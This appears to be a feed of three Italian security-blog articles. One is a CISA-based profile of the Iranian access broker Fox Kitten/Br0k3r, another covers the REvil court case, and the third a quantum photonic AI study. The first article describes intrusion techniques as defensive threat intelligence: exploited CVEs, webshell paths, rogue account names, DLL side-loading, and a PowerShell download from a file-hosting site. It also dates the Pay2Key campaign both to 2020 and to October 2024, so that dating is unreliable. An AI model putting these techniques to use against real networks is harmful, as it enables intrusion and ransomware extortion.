In un report del CISA pubblicato ad Agosto 2024, CISA, FBI e la divisione crimini informatici del DoD (Dipartimento della Difesa) affermano che un gruppo iraniano rintracciato come “Pioneer Kitten”, “Fox Kitten”, “UNC757”, “Parisite”, “RUBIDIUM” o “Lemon Sandstorm” ha avuto successo nel cyber crime nella vendita di accessi a reti aziendali violabili. Il gruppo ha operato utilizzando anche altri nomi come “Br0k3r” e “xplfinder” ed è stato osservato mentre vendeva accessi ad affiliati di operazioni RaaS come AlphV/BlackCat, NoEscape e RansomHouse.

Il report di CISA indica anche che nei casi in cui gli affiliati allo schema RaaS hanno avuto difficoltà nel crittografare i device nella rete della vittima, i membri dell’APT iraniano (il gruppo è infatti noto anche come APT33) hanno anche fornito aiuto in cambio di una percentuale sul riscatto ottenuto.

Vettori di attacchi

Nella ricerca è stato evidenziato come “Br0K3r” ottenga accessi alle reti violando vecchie vulnerabilità/CVE come quelle (pre 2024)

• dei gateway Citrix Netscaler (CVE-2019-19781, CVE-2023-3519)
• dei bilanciatori di carico F5 BIG-IP (CVE-2022-1388),

ma anche exploit più recenti (CVE del 2024)

• per i gateway sicuri di Check Point (CVE-2024-24919) e
• per i dispositivi PAN-OS e GlobalProtect VPN di Palo Alto Networks (CVE-2024-3400).

Il rapporto identifica il gruppo come formato da dipendenti di una società iraniana denominata Danesh Novin Sahand, il che fa sperare alcune delle loro vittime che vi sia la possibilità di portare un’accusa ufficiale nel prossimo futuro a tale organizzazione, forse in una corte internazionale.

Panoramica sui dettagli tecnici

Fox Kitten utilizza il motore di ricerca Shodan per identificare gli indirizzi IP che ospitano dispositivi vulnerabili a exploit specifici, come Citrix Netscaler, F5 Big-IP, Pulse Secure/Ivanti VPN o firewall PanOS. Una volta sfruttate le vulnerabilità, l’attore installa webshell e cattura credenziali di accesso prima di creare attività dannose per aggiungere malware backdoor e continuare a compromettere i sistemi. Vengono anche creati nuovi account con nomi che richiamano utenze di tipo ADMIN e vengono disattivati i sistemi EDR/Antivirus. In seguito, verrà fornito nell’articolo un maggiore dettaglio citando le TTPs citate nel rapporto CISA nel paragrafo “Tattiche, tecniche e procedure (TTP) “.

Siti onion di Br0k3r

Br0k3r ha adottato un nuovo approccio al modello commerciale IAB, utilizzando un sito ospitato da un singolo fornitore Tor per pubblicizzare i propri accessi su più forum. Questo sito Tor include istruzioni per le richieste e le modalità di acquisto dell’accesso. Secondo Br0k3r, ogni vendita di accesso include credenziali di amministratore di dominio (DA) di Windows, credenziali utente e hash di password di Active Directory (AD), zone e oggetti DNS e trust di dominio di Windows.

Il sito e il sistema sviluppati da Br0k3r sarebbero gestiti dallo stesso Br0k3r e non sarebbero collegati ad altri attori delle minacce. Ciò è dovuto al fatto che Br0k3r può creare fiducia nella sua clientela di criminali informatici. Si tratta di un servizio uno-a-molti e non di un mercato
Sito onion di Br0k3r fino a Luglio 2023
APT33 risulta essere un gruppo sponsorizzato dallo Stato iraniano attivo almeno dal 2013 (alcune fonti citano però essere attivo dal 2017). Ha preso di mira organizzazioni negli Stati Uniti, in Arabia Saudita e in Corea del Sud, con una forte attenzione ai settori dell’aviazione e dell’energia. Date le sue capacità di attacco e la sovrapposizione di attività con altre minacce costanti iraniane e la vittimologia condivisa, si ipotizza essere un gruppo legato al Corpo delle guardie rivoluzionarie islamiche (IRGC).

L’APT33, come altri gruppi subordinati all’IRGC, si aggiudica contratti nel mondo IT per operare sotto le mentite spoglie di un’azienda privata (per questo APT il nome della azienda è “Danesh Novin Sahand”) per renderne più difficile il tracciamento delle attività / l’attribuzione.

Storicamente, APT33 è stato associato a campagne di hacking e leaking, come l’operazione Pay2Key (research.checkpoint.com/2020/r…) alla fine del 2020, un’operazione di guerra informatica volta a minare la sicurezza informatica delle infrastrutture israeliane. Nel caso delle attività del gruppo APT33, sembra che si concentrino principalmente sul furto di credenziali e informazioni sensibili.

Br0k3r ora afferma sul sito web che “numerose bande di ransomware attive lavorano con me in una discreta percentuale [sic]”. Ciò evidenzia come Br0k3r esemplifichi il fatto che il rapporto tra gli operatori di ransomware e i broker di accesso iniziale (IAB) sia di reciproco vantaggio.

Lo Shop di Br0k3r consente agli operatori di ransomware di concentrarsi sul movimento laterale, sul furto di dati, sull’implementazione del payload del ransomware e sull’estorsione, anziché dedicare il proprio tempo al lungo lavoro per ottenere l’accesso alla rete. Gli operatori di ransomware forniscono inoltre un flusso di entrate costante a Br0k3r. Il costo dell’accesso è trascurabile rispetto al riscatto richiesto alle vittime, il che ha fatto esplodere il numero di offerte di vendita dell’accesso alle organizzazioni compromesse.
Sito onion Br0k3r da Agosto 2023: lo Shop di Br0k3r
Secondo SANS, chi decide di acquistare accessi da Br0k3r. riceve anche un’anteprima della rete di cui sta comprando credenziali di accesso. Questa include i domini della vittima e un riepilogo dell’organizzazione della vittima tratto da ZoomInfo. Per dimostrare che l’accesso è legittimo, Br0k3r offre anche la prova dei privilegi di amministratore di dominio, del livello di accesso aziendale, delle dimensioni della rete e del sistema antivirus o di rilevamento e risposta degli endpoint (EDR) in uso. Una volta che il potenziale acquirente conferma di avere un portafoglio con fondi disponibili, l’affare viene concluso.

Implicazioni

Queste attività di vendita di accessi puntano ad ampliare la portata delle minacce cyber da parte di attori con sede in Iran, riferisce il rapporto. All’inizio del 2024, FBI, CISA e il Dipartimento della Salute e dei Servizi Umani hanno aggiornato il loro allarme di sicurezza informatica su ALPHV (gang cliente dello IAB Br0k3r) per evidenziare nuovi indicatori di compromissione specificamente rivolti al settore sanitario. Nonostante i tentativi di FBI di interrompere le operazioni di gruppi di ransomware come ALPHV, questi gruppi continuano a rappresentare una minaccia significativa.

Motivazioni dello IAB

Spionaggio, sabotaggio, denaro.

Stati/Settori Target

USA, Israele, Azerbaidjan, Arabia Saudita, Corea del sud

Settori: Istituzioni finanziarie, Aviazione, Energia, Istruzione, Governo, Sanità

Vettori di attacco

Uso di proxy, Spearphishing, applicazioni rivolte al pubblico, messaggistica sui social media, pacchetti dannosi (NPM, Pip), Watering hole, attacchi alla Supply Chain

Tools & Malware

Wiper: Shamoon

Custom backdoor: Tickler, FalseFont

Remote Access Trojan: QuasarRAT

TOX id usati da Br0k3r

Jabber/XMPP ID br0k3r[@]xmpp[.]jp

Scenari principali in cui l’attore ha operato

Pay2Key (Ottobre 2024)

Due dozzine di aziende israeliane sono state prese di mira nell’ottobre 2024: prove forensi collegano la campagna a Fox Kitten. JNS riporta che una di esse è collegata al sistema di difesa aerea di Israele noto con il nome Iron Dome: “Fox Kitten, nella campagna Pay2Key, ha affermato di essere riuscito a violare il sistema informatico della società Elta Systems, filiale di Israel Aerospace Industries (IAI), che ha sviluppato il radar utilizzato nel sistema di difesa missilistico Iron Dome; Fox Kitten/Br0k3r avrebbe diffuso dati sensibili sul dark web”.

“Knock Knock! Tonight is longer than longest night for @ILAerospaceIAI”

“Toc Toc! Questa notte è più lunga della notte più lunga per @ILAerospaceIAI”

ha twittato dopo l’attacco del 2024.

Tattiche, tecniche e procedure (TTP)

Panoramica delle tattiche, delle tecniche e delle procedure osservate secondo il rapporto CISA. Le intrusioni iniziali di questo attore iraniano si basano sullo sfruttamento di servizi esterni remoti su risorse esposte in Internet per ottenere l’accesso iniziale alle reti delle vittime.

A partire dal luglio 2024, questo attore è stato osservato scansionare indirizzi IP che ospitano gateway di sicurezza Check Point, alla ricerca di dispositivi potenzialmente vulnerabili a CVE2024-24919. Da aprile 2024, ha condotto una scansione di massa degli indirizzi IP che ospitano i sistemi PAN-OS e GlobalPOS di Palo Alto Networks: era molto probabilmente in atto una ricognizione ed un rilevamento di dispositivi vulnerabili a CVE-2024-3400. Storicamente, questo gruppo ha violato le aziende sfruttando CVE-2019-19781 e CVE-2023-3519 relative a Citrix Netscaler e CVE-2022-1388 relative ai dispositivi BIG-IP F5.

Ricognizione, accesso iniziale, persistenza e accesso alle credenziali

L’attore è stato osservato mentre utilizzava il motore di ricerca Shodan per identificare ed enumerare gli indirizzi IP che ospitano dispositivi vulnerabili a un particolare CVE. L’accesso iniziale degli attori è solitamente ottenuto sfruttando un dispositivo di rete esposto al pubblico, come Citrix Netscaler (CVE-2019-19781 e CVE-2023-3519), F5 BIG-IP (CVE-2022-1388), Pulse Secure/Ivanti VPN (CVE-2024-21887) e, più recentemente, PanOS (CVE-2024-3400).

Dopo aver violato i dispositivi vulnerabili, vengono utilizzate le seguenti tecniche:

• Cattura di credenziali di accesso tramite webshell sui dispositivi Netscaler compromessi e aggiunta di esse al file denominato netscaler.1 nella stessa directory della webshell.
• Creazione della directory /var/vpn/themes/imgs/ sui dispositivi Citrix Netscaler per distribuire una webshell. I file dannosi distribuiti in questa directory includono:
  
  • netscaler.1
  • netscaler.php
  • ctxHeaderLogon.php

  
  

• Per quanto riguarda specificamente Netscaler, posizionamento di ulteriori webshell sui dispositivi compromessi immediatamente dopo che i proprietari del sistema hanno applicato una patch alla vulnerabilità sfruttata. Sui dispositivi sono stati osservati i seguenti percorsi e nomi di file:
  
  • /netscaler/logon/LogonPoint/uiareas/ui_style.php
  • /netscaler/logon/sanpdebug.php

  
  

• Creazione della directory “/xui/common/images/” su indirizzi IP mirati.
• Creazione di account sulle reti delle vittime; i nomi osservati includono “sqladmin$”, “adfsservice“, “IIS_Admin“, “iis-admin” e “John McCain“.
• Richiesta di esenzioni alle politiche di sicurezza e di applicazione zero-trust per gli strumenti che intendono distribuire come malevoli sulla rete della vittima.
• Creazione di un’attività pianificata dannosa SpaceAgentTaskMgrSHR nella cartella delle attività di Windows/Spaceport. Questo task utilizza una tecnica di side-loading di DLL contro l’eseguibile firmato Microsoft SysInternals contig.exe, che può essere rinominato in dllhost.ext, per caricare un payload da version.dll. Questo file è stato osservato mentre veniva eseguito dalla directory “Download” di Windows.
• Creazione di una backdoor maligna “version.dll” nella directory C:\Windows\ADFS\.
• Creazione di un’attività pianificata per caricare il malware attraverso le backdoor installate.
• Distribuzione di “Meshcentral” per connettersi ai server compromessi per l’accesso remoto.
• Creazione di un’attività di servizio Windows giornaliera con otto caratteri casuali e tentativo di esecuzione di una DLL dal nome simile contenuta in un file in C:\Windows\system32\drivers\. Ad esempio, è stato osservato un servizio denominato “test” che tentava di caricare un file il cui percorso completo era C:\WINDOWS\system32\drivers\test.sys.

Execution, Privilege Escalation, and Defense Evasion

• Riutilizzo di credenziali compromesse dallo sfruttamento di dispositivi di rete, come Citrix Netscaler, per accedere ad altre applicazioni (ad esempio, Citrix XenDesktop).
• Riutilizzo di credenziali amministrative degli amministratori di rete per accedere ai controller di dominio e ad altre infrastrutture sulle reti delle vittime.
• Utilizzo di credenziali di amministratore per disabilitare il software antivirus e di sicurezza e abbassare i criteri PowerShell a un livello di sicurezza inferiore.
• Tentativo di inserire i tool usati dall’attore malevolo nella white list dei tool permessi dai sw di sicurezza dei dispositivi e della rete.
• Utilizzo di un account amministratore compromesso per avviare una sessione desktop remota su un altro server della rete. In un caso, l’FBI ha osservato che questa tecnica è stata utilizzata per tentare di avviare Microsoft Windows PowerShell Integrated Scripted Environment (ISE) per eseguire il comando “InvokeWebRequest” con un URI che include files.catbox[.]moe. Catbox è un sito di file hosting online gratuito che gli attori utilizzano come repository/meccanismo di hosting.

Discovery

• Esportazione degli hives del registro di sistema e delle configurazioni del firewall di rete sui server compromessi.
• Esfiltrazione dei nomi degli account dal controller di dominio vittima, nonché accesso ai file di configurazione, ai log e ai registri, presumibilmente per raccogliere informazioni sugli account di rete e degli utenti da utilizzare per un ulteriore violazione.

Command e control

• Installazione di un programma di accesso remoto tipo “AnyDesk” come metodo di accesso di backup
• Abilitazione di server all’uso di Windows PowerShell Web Access
• Utilizzo di uno strumento di tunneling open source Ligolo (ligolo/ligolo-ng)
• Utilizzo della distribuzione NGROK (ngrok[.]io) per creare connessioni in uscita a un sottodominio casuale.

IoC

Il rapporto CISA Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations | CISA contiene anche IoC in formato STYX scaricabili.

Conclusione

FBI e CISA raccomandano a tutte le organizzazioni di implementare le misure di mitigazione per migliorare la propria postura di sicurezza informatica in base alla attività del gruppo informatico iraniano. FBI ritiene che l’obiettivo del gruppo si basi principalmente sull’identificazione di dispositivi vulnerabili alle CVE citate quindi, qualsiasi organizzazione dovrebbe difendersi dallo sfruttamento delle vulnerabilità note con politiche di patching e sostituzione degli apparati e dei software deprecati/obsoleti soprattutto se esposti su IP pubblici.

Sono sempre da tenere in considerazione, inoltre, le best practice descritte nel precedente articolo sullo IAB miyako al paragrafo “Strategie di difesa contro gli IAB”:

• Controlli di Accesso Forti
• Segmentazione/micro segmentazione della rete
• Monitoraggio Continuo e Rilevamento delle Minacce
• Formazione e Consapevolezza dei Dipendenti
• Piani di risposta agli incidenti
• Soluzioni di Backup e recupero Sicure
• Servizi di Intelligence sulle minacce

L33t / 1337 code

Leet (a volte scritto come “1337” o “l33t”), noto anche come eleet o leetspeak, è un altro alfabeto per la lingua inglese o italiana (o altra lingua) utilizzato soprattutto su Internet. Utilizza varie combinazioni di caratteri ASCII per sostituire le lettere latine con numeri che assomigliano alle lettere o numeri che le possono ricordare.

Br0k3r … ricorda Broker … come m13l3, ricorda miele e scu014, scuola … un ottimo approcio per rendere più complicate le nostre password.

1337 41n’t s0 7rIckY!

Bibliografica

• Outpost24.com IAB-and-links-to-ransomware.pdf
• Risky Biz news.risky.biz/risky-biz-news-…
• Sekoia blog.sekoia.io/cyber-threats-i…
• WatchGuard watchguard.com/it/wgrd-ransomw…
• Checkpoint research.checkpoint.com/2020/r…
• Cisco DUO su UNC757 duo.com/decipher/u-s-governmen…
• CrowStrike su Pioneer Kitten crowdstrike.com/en-us/blog/who…
• TechRepublic su Fox Kitten techrepublic.com/article/iran-…
• CISA.gov report Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations | CISA
• CISA.gov report tech details ic3.gov/CSA/2024/240828.pdf
• JNS Iranian hacker group claims to have penetrated IAI subsidiary – JNS.org
• MITRE su FOX Kitten attack.mitre.org/groups/G0117

L'articolo Fox Kitten e Br0k3r: Il Cyber Contractor Iraniano che Collabora con le Ransomware Gang proviene da il blog della sicurezza informatica.

Vi ricordate della famigerata cyber gang REvil? Il gruppo di hacker russi responsabile di alcuni dei più devastanti attacchi ransomware agli albori di questa minaccia globale, noti per pubblicare le loro “imprese” criminali sul celebre forum underground “Happy Blog”.

Il Tribunale Dzerzhinsky di San Pietroburgo ha condannato altri quattro partecipanti al caso del gruppo di hacker REvil (alias Sodinokibi), secondo quanto riportato dai media. A tutti i condannati sono state inflitte pene detentive effettive, ma gli imputati sono stati rilasciati, avendo già scontato integralmente la pena in custodia cautelare, durante le indagini e il processo.

Le attività di REvil cessarono a gennaio 2022, dopo che l’FSB ha annunciato l’arresto di 14 persone associate al gruppo e ha effettuato perquisizioni in 25 indirizzi nelle regioni di Mosca, San Pietroburgo, Leningrado e Lipetsk. All’epoca, è stato riferito che “la base per le attività di perquisizione era un appello delle competenti autorità statunitensi”. Di conseguenza, il Tribunale Tverskoj di Mosca ha disposto la custodia cautelare in carcere di otto presunti membri del gruppo di hacker. Sono stati accusati di aver acquisito e conservato mezzi elettronici destinati al trasferimento illegale di fondi da parte di un gruppo organizzato (Parte 2 dell’Articolo 187 del Codice Penale della Federazione Russa).

Tuttavia, l’indagine è riuscita ad incriminare gli otto presunti autori solo per due furti di denaro remoti, commessi negli Stati Uniti, senza che nessuno sappia da chi, dove e per quale importo. I media hanno riferito che non ci sono state vittime né danni nel procedimento penale. Nel maggio 2022, si è appreso che le autorità americane si erano rifiutate di collaborare ulteriormente con la Russia. Di conseguenza, è stato possibile accusare i sospettati solo di frode con le carte di credito di due messicani residenti negli Stati Uniti.

Di conseguenza, il caso del gruppo di hacker è sostanzialmente giunto a un punto morto. Nella versione finale del caso, tutti gli imputati sono stati accusati di 24 episodi di “fabbricazione e vendita di carte di credito o di debito contraffatte” (articolo 187 del Codice Penale della Federazione Russa), e il presunto leader del gruppo, Daniil Puzyrevsky, residente a San Pietroburgo, è stato anche incriminato ai sensi dell’articolo 273 del Codice Penale della Federazione Russa, che prevede la responsabilità per “la creazione o l’utilizzo di programmi informatici per distruggere o bloccare informazioni informatiche, nonché per la neutralizzazione dei mezzi di protezione delle stesse”.

Il fatto è che uno dei programmi trovati nei computer portatili degli imputati è stato ritenuto dannoso in seguito all’esame degli esperti ordinato dall’inchiesta. In effetti, l’indagine ha stabilito che gli imputati non avevano commesso alcun reato in Russia e il Dipartimento di Stato non ha mai fornito le prove promesse sul loro possibile coinvolgimento in truffe finanziarie negli Stati Uniti.

Pertanto, secondo l’indagine, le vittime di REvil erano due cittadine statunitensi di origine messicana, una certa Otilia Pevez e una certa Otilia Sisniega Pevez. Le imputate avrebbero rubato una certa somma di denaro dalle loro carte di credito a distanza, spendendola per acquistare beni su negozi online. Tuttavia, queste donne non sono state trovate. Di conseguenza, i presunti partecipanti a REvil potevano essere accusati solo di uso illegale di carte di credito e di archiviazione di malware. Non è stato inoltre possibile determinare l’origine del denaro contante sequestrato agli imputati (426 milioni di rubli, 600.000 dollari o 500.000 euro), e gli esperti non si sono nemmeno impegnati a valutare la criptovaluta in loro possesso.

Nell’autunno del 2024, il tribunale ha dichiarato Artem Zayets, Aleksey Malozemov, Daniil Puzyrevsky e Ruslan Khansvyarov colpevoli di circolazione illegale di strumenti di pagamento (Parte 2 dell’articolo 187 del Codice Penale della Federazione Russa). Puzyrevsky e Khansvyarov sono stati inoltre ritenuti colpevoli del già citato utilizzo e distribuzione di malware (Parte 2 dell’articolo 273 del Codice Penale della Federazione Russa).

Di conseguenza, Zayets e Malozemov furono condannati a 4,5 e 5 anni in una colonia penale di regime generale, mentre Khansvyarov e Puzyrevsky ricevettero rispettivamente 5,5 e 6 anni. Come reso noto questa settimana, il tribunale ha dichiarato tutti e quattro colpevoli di molteplici reati. Di conseguenza, Bessonov, Golovachuk, Muromskoy e Korotayev sono stati condannati a cinque anni di carcere in una colonia penale a regime generale. Prima dell’entrata in vigore della sentenza, la misura cautelare per gli imputati è stata trasformata in un impegno scritto a non lasciare il paese.

Il tribunale ha inoltre ordinato la confisca di due BMW del 2020 a Bessonov, per un valore di 51,8 milioni di rubli e 497.000 dollari, e di una Mercedes Benz C 200 del 2019 a Korotaev. Contemporaneamente, l’ufficio stampa congiunto dei tribunali cittadini riporta sul suo canale Telegram che tutti e quattro sono stati rilasciati dalla custodia cautelare in aula, poiché avevano già scontato la pena in un centro di detenzione preventiva, nella fase delle indagini e del processo. Dopotutto, un giorno di arresto equivale a un giorno e mezzo in una colonia penale.

L'articolo REvil: Condannati ma poi liberi. Il caso giudiziario più controverso di sempre proviene da il blog della sicurezza informatica.

Gli scienziati hanno dimostrato per la prima volta che il campionamento quantistico di bosoni, precedentemente considerato uno strumento prevalentemente teorico, può essere applicato nella pratica. Un team di ricercatori dell’Okinawa Institute of Science and Technology (OIST) hanno sviluppato un sistema di riconoscimento delle immagini basato sull’interferenza quantistica delle particelle luminose. Il loro lavoro, pubblicato sulla rivista Optica Quantum, potrebbe rappresentare una svolta per la creazione di sistemi di intelligenza artificiale quantistica a basso consumo energetico.

Il metodo si basa sul fenomeno per cui i fotoni attraversano un circuito ottico creano complessi schemi di interferenza. Questi schemi sono estremamente difficili da prevedere utilizzando l’informatica classica. A differenza dei modelli di apprendimento automatico convenzionali, il comportamento quantistico della luce stessa gioca un ruolo importante in questo caso.

I ricercatori hanno utilizzato solo tre fotoni e una rete ottica per trasformare le informazioni codificate dell’immagine in uno stato quantistico ad alta dimensionalità. Il sistema ha ricevuto in input immagini semplificate in scala di grigi, che sono state pre-elaborate utilizzando l’analisi delle componenti principali per estrarne le caratteristiche chiave. Questi dati sono stati quindi immessi nel sistema quantistico, dove i fotoni hanno creato una distribuzione di probabilità unica in uscita. Il segnale quantistico risultante è stato quindi elaborato da un semplice classificatore lineare.

Nonostante la sua apparente complessità, il modello si è rivelato sorprendentemente compatto. L’unico elemento addestrabile era il classificatore finale, mentre le componenti quantistiche stesse sono rimaste universali. Ciò ha permesso al sistema di riconoscere efficacemente immagini da diversi set di dati senza ulteriori interventi di ottimizzazione.

Secondo uno degli autori dello studio, il Dott. Akitada Sakurai, questo approccio semplifica l’uso dei modelli quantistici e apre la strada a nuove applicazioni. Il suo collega, il Professor William Munro, ha osservato che la robustezza del metodo rispetto a diversi tipi di immagini lo rende particolarmente promettente per applicazioni nel mondo reale.

Lo studio dimostra che anche con un numero limitato di fotoni si possono ottenere risultati impressionanti nel riconoscimento di pattern. Gli autori sottolineano che il loro sistema non rappresenta una soluzione universale a tutti i problemi di calcolo, ma mostra già progressi significativi nel campo dell’intelligenza artificiale quantistica e può diventare la base per modelli più ampi e potenti in futuro.

L'articolo AI quantistica con 3 fotoni: la rivoluzione del campionamento è iniziata in Giappone proviene da il blog della sicurezza informatica.